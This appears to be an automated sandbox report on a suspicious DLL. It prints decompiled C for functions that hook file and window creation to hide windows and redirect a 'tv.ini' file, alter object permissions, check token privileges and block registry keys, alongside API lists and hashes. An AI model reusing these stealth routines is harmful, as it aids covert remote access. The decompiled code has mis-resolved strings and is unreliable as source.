                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F337C40(signed int __eax, WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28, intOrPtr _a32, intOrPtr _a36) {
				char _v516;
				short _v524;
				short _v532;
				signed int _t19;
				void* _t22;
				WCHAR* _t24;
				WCHAR* _t27;
				struct _SECURITY_ATTRIBUTES* _t35;
				short _t40;
				intOrPtr _t41;
				WCHAR* _t45;
				WCHAR* _t48;
				short _t50;
				WCHAR* _t53;
				WCHAR* _t55;

				_t19 = __eax;
				_t55 = _a4;
				if(_t55 == 0) {
					L10:
					_t22 = CreateFileW(_t55, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					return _t22;
				} else {
					if( *_t55 != 0x3a) {
						_t53 = PathFindFileNameW(_t55);
						_t24 = M6F340528; // 0x9773e8
						if(lstrcmpiW(_t55, _t24) == 0) {
							_pop(_t53);
							_pop(_t55);
							_t45 = M6F340534; // 0x98a1a0
							_a4 = _t45;
							goto M6F3405A4;
						}
						_t48 = M6F34056C; // 0x77af54
						_t19 = lstrcmpiW(_t53, _t48);
						if(_t19 == 0) {
							goto L2;
						} else {
							_t27 = M6F340554; // 0x749734
							_t19 = StrCmpNIW(_t55, _t27, 0xb);
							if(_t19 == 0) {
								goto L2;
							} else {
								if(lstrcmpiW(_t53, L"tv.ini") != 0) {
									goto L10;
								} else {
									_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									wsprintfW( &_v532, L"%s%s", _t40, _t53);
									if(lstrcmpiW( &_v524, _t55) != 0) {
										goto L10;
									} else {
										_t41 = M6F340550; // 0x749736
										_t50 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
										wsprintfW( &_v524, L"%s%s%s", _t50, _t41, L".ini");
										_push(_a36);
										_push(_a32);
										_push(_a28);
										_t35 = _a16;
										_push(_a24);
										_push(_a20);
										_push(_t35);
										_push( &_v516);
										M6F3405A4();
										return _t35;
									}
								}
							}
						}
					} else {
						L2:
						return _t19 | 0xffffffff;
					}
				}
			}


















                                                                                                                        0x6f337c40
                                                                                                                        0x6f337c48
                                                                                                                        0x6f337c52
                                                                                                                        0x6f337d65
                                                                                                                        0x6f337d96
                                                                                                                        0x6f337da5
                                                                                                                        0x6f337c58
                                                                                                                        0x6f337c5c
                                                                                                                        0x6f337c7a
                                                                                                                        0x6f337c7c
                                                                                                                        0x6f337c87
                                                                                                                        0x6f337c89
                                                                                                                        0x6f337c8a
                                                                                                                        0x6f337c92
                                                                                                                        0x6f337c98
                                                                                                                        0x6f337c9c
                                                                                                                        0x6f337c9c
                                                                                                                        0x6f337ca2
                                                                                                                        0x6f337caa
                                                                                                                        0x6f337cae
                                                                                                                        0x00000000
                                                                                                                        0x6f337cb0
                                                                                                                        0x6f337cb0
                                                                                                                        0x6f337cb9
                                                                                                                        0x6f337cc1
                                                                                                                        0x00000000
                                                                                                                        0x6f337cc3
                                                                                                                        0x6f337ccd
                                                                                                                        0x00000000
                                                                                                                        0x6f337cd3
                                                                                                                        0x6f337cd3
                                                                                                                        0x6f337ceb
                                                                                                                        0x6f337cfa
                                                                                                                        0x00000000
                                                                                                                        0x6f337cfc
                                                                                                                        0x6f337cfc
                                                                                                                        0x6f337d02
                                                                                                                        0x6f337d19
                                                                                                                        0x6f337d33
                                                                                                                        0x6f337d3b
                                                                                                                        0x6f337d43
                                                                                                                        0x6f337d44
                                                                                                                        0x6f337d4b
                                                                                                                        0x6f337d4c
                                                                                                                        0x6f337d4d
                                                                                                                        0x6f337d52
                                                                                                                        0x6f337d53
                                                                                                                        0x6f337d62
                                                                                                                        0x6f337d62
                                                                                                                        0x6f337cfa
                                                                                                                        0x6f337ccd
                                                                                                                        0x6f337cc1
                                                                                                                        0x6f337c60
                                                                                                                        0x6f337c60
                                                                                                                        0x6f337c6a
                                                                                                                        0x6f337c6a
                                                                                                                        0x6f337c5c

                                                                                                                        APIs
                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 6F337C6E
                                                                                                                        • lstrcmpiW.KERNEL32(?,009773E8), ref: 6F337C83
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 6F337D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$tv.ini
                                                                                                                        • API String ID: 3438131021-2591480844
                                                                                                                        • Opcode ID: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction ID: 2ed0c9728fc17fd149b52cc483663096b9a1a927e199fac55dd38c4ecf834b56
                                                                                                                        • Opcode Fuzzy Hash: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction Fuzzy Hash: D331A2B3608651AFD320EBA8DC84EAB73ADEFC9730F10451DF95583240DB35E8158B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332000, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 22%
                                                                                                                        			E6F332000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v40;
				char _v48;
				void* _v52;
				long _v56;
				long _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v108;
				intOrPtr _t28;
				intOrPtr _t29;
				long* _t34;
				signed int _t38;
				void* _t50;
				long _t52;
				intOrPtr _t55;

				_t28 =  *_a8;
				_t52 = 0;
				_v48 = 0;
				if(_t28 == 0) {
					_t29 = _a4;
					if(_t29 == 0) {
						goto L2;
					} else {
						_t55 = _a12;
						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
						if(_t29 != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					_t55 = _a12;
					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
					if(_t28 == 0) {
						L5:
						_v68 = 0x44;
						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
						if(_t50 != 0) {
							_t34 =  &_v68;
							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
							if(_t34 != 0) {
								_v76 = 1;
								_v80 = 0x10000000;
								_v72 = 3;
								_v64 = 0;
								_v68 = 0;
								_v52 = _t50;
								_v60 = 0;
								_v56 = 0;
								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
								_t38 =  *_v56;
								if(_t38 == 0) {
									_t38 = _v60;
									if(_t38 != 0) {
										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0); // executed
										goto L11;
									}
								} else {
									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0);
									L11:
									asm("sbb esi, esi");
									_t52 =  ~_t38 + 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
						return _t52;
					} else {
						L2:
						return 0;
					}
				}
			}























                                                                                                                        0x6f332007
                                                                                                                        0x6f33200e
                                                                                                                        0x6f332010
                                                                                                                        0x6f332016
                                                                                                                        0x6f332040
                                                                                                                        0x6f332046
                                                                                                                        0x00000000
                                                                                                                        0x6f332048
                                                                                                                        0x6f332048
                                                                                                                        0x6f33205d
                                                                                                                        0x6f332065
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332065
                                                                                                                        0x6f332018
                                                                                                                        0x6f332018
                                                                                                                        0x6f33202d
                                                                                                                        0x6f332035
                                                                                                                        0x6f332067
                                                                                                                        0x6f33206c
                                                                                                                        0x6f332081
                                                                                                                        0x6f332085
                                                                                                                        0x6f33208b
                                                                                                                        0x6f332094
                                                                                                                        0x6f33209c
                                                                                                                        0x6f3320b3
                                                                                                                        0x6f3320bb
                                                                                                                        0x6f3320c3
                                                                                                                        0x6f3320cb
                                                                                                                        0x6f3320cf
                                                                                                                        0x6f3320d3
                                                                                                                        0x6f3320d7
                                                                                                                        0x6f3320db
                                                                                                                        0x6f3320df
                                                                                                                        0x6f3320e9
                                                                                                                        0x6f3320ed
                                                                                                                        0x6f332103
                                                                                                                        0x6f332109
                                                                                                                        0x6f332117
                                                                                                                        0x00000000
                                                                                                                        0x6f332117
                                                                                                                        0x6f3320ef
                                                                                                                        0x6f3320fb
                                                                                                                        0x6f33211d
                                                                                                                        0x6f332121
                                                                                                                        0x6f332123
                                                                                                                        0x6f332123
                                                                                                                        0x6f3320ed
                                                                                                                        0x6f33212d
                                                                                                                        0x6f33212d
                                                                                                                        0x6f33213c
                                                                                                                        0x6f332039
                                                                                                                        0x6f332039
                                                                                                                        0x6f33203f
                                                                                                                        0x6f33203f
                                                                                                                        0x6f332035

                                                                                                                        APIs
                                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33202D
                                                                                                                        • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33205D
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 6F332074
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33207B
                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6F332094
                                                                                                                        • SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6F3320DF
                                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6F3320FB
                                                                                                                        • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6F332117
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332126
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33212D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                                        • Opcode ID: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction ID: d811240a3e099263e6a1628e8a8cff13de36a9642bc120c27838345c56475953
                                                                                                                        • Opcode Fuzzy Hash: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction Fuzzy Hash: 354108B2604399AFE710CF54CD88E6BBBBDEB85B98F40481DF641C6140D676EC488B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333280, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E6F333280(void* _a4) {
				void _v0;
				void* _v16;
				void _v72;
				long _v76;
				long _v80;
				long _v84;
				void* _v88;
				char _v96;
				DWORD* _t32;
				int _t36;
				long _t52;

				_t52 = _a4;
				_v76 = 0;
				_v84 = _t52;
				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
					_a4 = 0;
					_v80 = 0;
					if( *0x6f34027c <= 5) {
						L7:
						DuplicateToken(_v84, 1,  &_a4);
						if(_v0 != 0) {
							goto L8;
						}
					} else {
						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
						if(_t36 != 0 && _v76 == 3) {
							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
						}
						if(_v0 != 0) {
							L8:
							_t32 =  &_v84;
							_v84 = 0x44;
							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
							if(_t32 != 0) {
								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
							}
							FindCloseChangeNotification(_v16); // executed
						} else {
							goto L7;
						}
					}
					if(_t52 == 0) {
						CloseHandle(_v88);
					}
					return _v80;
				} else {
					return _v76;
				}
			}














                                                                                                                        0x6f333284
                                                                                                                        0x6f333288
                                                                                                                        0x6f333290
                                                                                                                        0x6f333296
                                                                                                                        0x6f3332bd
                                                                                                                        0x6f3332c5
                                                                                                                        0x6f3332cd
                                                                                                                        0x6f333313
                                                                                                                        0x6f33331f
                                                                                                                        0x6f33332a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3332cf
                                                                                                                        0x6f3332e9
                                                                                                                        0x6f3332ed
                                                                                                                        0x6f333309
                                                                                                                        0x6f333309
                                                                                                                        0x6f333311
                                                                                                                        0x6f33332c
                                                                                                                        0x6f33332c
                                                                                                                        0x6f33333a
                                                                                                                        0x6f333342
                                                                                                                        0x6f33334a
                                                                                                                        0x6f33335b
                                                                                                                        0x6f33335b
                                                                                                                        0x6f333366
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333311
                                                                                                                        0x6f33336a
                                                                                                                        0x6f333371
                                                                                                                        0x6f333371
                                                                                                                        0x6f33337c
                                                                                                                        0x6f33337d
                                                                                                                        0x6f333385
                                                                                                                        0x6f333385

                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6F3332A1
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6F3332E9
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6F333309
                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6F33331F
                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6F333342
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6F33335B
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F333366
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1214873377-2746444292
                                                                                                                        • Opcode ID: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction ID: 08229b83593daad8b88303d06cb7f4518142c8a9b4845ba5e457421a3d9ed692
                                                                                                                        • Opcode Fuzzy Hash: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction Fuzzy Hash: 323118B2548349AFD710DB54C845FABB7E9BBC4B24F00C90DF5A587280DB75E509CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338100, Relevance: 7.6, APIs: 5, Instructions: 94stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 63%
                                                                                                                        			E6F338100(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
				short _v520;
				signed int _t16;
				struct HWND__* _t21;
				long _t33;
				intOrPtr _t35;
				long _t37;
				WCHAR* _t38;
				int _t41;
				struct HWND__* _t53;

				_t33 = _a16;
				if((_t33 & 0x40000000) == 0 || _t33 < 0) {
					_t16 = 1;
					_t33 = _t33 & 0xefffffff;
					_t37 = 0x8000080;
				} else {
					_t37 = _a4;
					_t16 = 0;
				}
				asm("sbb eax, eax");
				_t21 = CreateWindowExW(_t37, _a8,  !( ~_t16) & _a12, _t33,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
				_t53 = _t21;
				_t41 = GetClassNameW(_t53,  &_v520, 0x103);
				if(_t41 <= 0) {
					L10:
					return _t53;
				} else {
					_t38 = M6F340560; // 0x77fbf8
					if(lstrcmpiW( &_v520, _t38) != 0) {
						if(_t41 > 1) {
							_t35 = M6F340558; // 0x7982c4
							if(lstrcmpiW( &_v520, _t35 + 2) == 0) {
								_push(4);
								_push(_t53);
								 *0x6f34039c = _t53;
								M6F3405B8();
								_push(0x1a);
								_push(1);
								_push(1);
								_push(0);
								_push(0);
								_push(0);
								_push(_t53);
								M6F3405C4();
							}
						}
						goto L10;
					} else {
						DestroyWindow(_t53);
						return 0;
					}
				}
			}












                                                                                                                        0x6f338100
                                                                                                                        0x6f338110
                                                                                                                        0x6f3381c6
                                                                                                                        0x6f3381cb
                                                                                                                        0x6f3381d1
                                                                                                                        0x6f33811e
                                                                                                                        0x6f33811e
                                                                                                                        0x6f338125
                                                                                                                        0x6f338125
                                                                                                                        0x6f338163
                                                                                                                        0x6f33817a
                                                                                                                        0x6f338189
                                                                                                                        0x6f338193
                                                                                                                        0x6f338197
                                                                                                                        0x6f338217
                                                                                                                        0x6f338222
                                                                                                                        0x6f338199
                                                                                                                        0x6f338199
                                                                                                                        0x6f3381af
                                                                                                                        0x6f3381de
                                                                                                                        0x6f3381e0
                                                                                                                        0x6f3381f3
                                                                                                                        0x6f3381f5
                                                                                                                        0x6f3381f7
                                                                                                                        0x6f3381f8
                                                                                                                        0x6f3381fe
                                                                                                                        0x6f338204
                                                                                                                        0x6f338206
                                                                                                                        0x6f338208
                                                                                                                        0x6f33820a
                                                                                                                        0x6f33820c
                                                                                                                        0x6f33820e
                                                                                                                        0x6f338210
                                                                                                                        0x6f338211
                                                                                                                        0x6f338211
                                                                                                                        0x6f3381f3
                                                                                                                        0x00000000
                                                                                                                        0x6f3381b1
                                                                                                                        0x6f3381b2
                                                                                                                        0x6f3381c3
                                                                                                                        0x6f3381c3
                                                                                                                        0x6f3381af

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6F33817A
                                                                                                                        • GetClassNameW.USER32 ref: 6F33818D
                                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 6F3381AB
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 6F3381B2
                                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 6F3381EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2351571968-0
                                                                                                                        • Opcode ID: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction ID: f7c36f7a8f2a3fa451227185245e1935a44bf41670ded956ebe92e91c3711808
                                                                                                                        • Opcode Fuzzy Hash: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction Fuzzy Hash: 5E31D273A59761ABE720DA68CC45FEB73ACEB89720F04090DFA55D3180D674A804CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337BD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337BD0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
				long _t7;
				WCHAR* _t8;
				WCHAR* _t14;

				_t14 = _a8;
				if(_t14 == 0) {
					L3:
					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
					return _t7;
				} else {
					_t8 = M6F34054C; // 0x78645c
					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
						goto L3;
					} else {
						return 2;
					}
				}
			}






                                                                                                                        0x6f337bd1
                                                                                                                        0x6f337bd7
                                                                                                                        0x6f337bf5
                                                                                                                        0x6f337c0a
                                                                                                                        0x6f337c11
                                                                                                                        0x6f337bd9
                                                                                                                        0x6f337bd9
                                                                                                                        0x6f337bea
                                                                                                                        0x00000000
                                                                                                                        0x6f337bec
                                                                                                                        0x6f337bf2
                                                                                                                        0x6f337bf2
                                                                                                                        0x6f337bea

                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337BE2
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 6F337C0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 71445658-3316144491
                                                                                                                        • Opcode ID: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction ID: f5b9657d3a9e03e4d8a76d23d97bd5a12ec788d006bad21c6462854e62da286f
                                                                                                                        • Opcode Fuzzy Hash: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction Fuzzy Hash: 05E06DB2618660EBD210DE18D844EAB77BCEF99B20F00C90DB95587201C730EC11CBB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B4C0, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B4C0() {
				void* _t4;
				void* _t13;

				E6F33B460();
				_t13 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
				if(_t13 != 0) {
					E6F33B4B0();
					return 1;
				} else {
					_t4 = HeapCreate(0, 0, 0); // executed
					"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t4;
					if(_t4 == 0) {
						E6F33B4B0();
						return 9;
					} else {
						E6F33A540(_t4);
						E6F33B4B0();
						return 0;
					}
				}
			}





                                                                                                                        0x6f33b4c3
                                                                                                                        0x6f33b4c8
                                                                                                                        0x6f33b4ce
                                                                                                                        0x6f33b503
                                                                                                                        0x6f33b50b
                                                                                                                        0x6f33b4d0
                                                                                                                        0x6f33b4d3
                                                                                                                        0x6f33b4d9
                                                                                                                        0x6f33b4e0
                                                                                                                        0x6f33b4f5
                                                                                                                        0x6f33b4fd
                                                                                                                        0x6f33b4e2
                                                                                                                        0x6f33b4e2
                                                                                                                        0x6f33b4e7
                                                                                                                        0x6f33b4ef
                                                                                                                        0x6f33b4ef
                                                                                                                        0x6f33b4e0

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
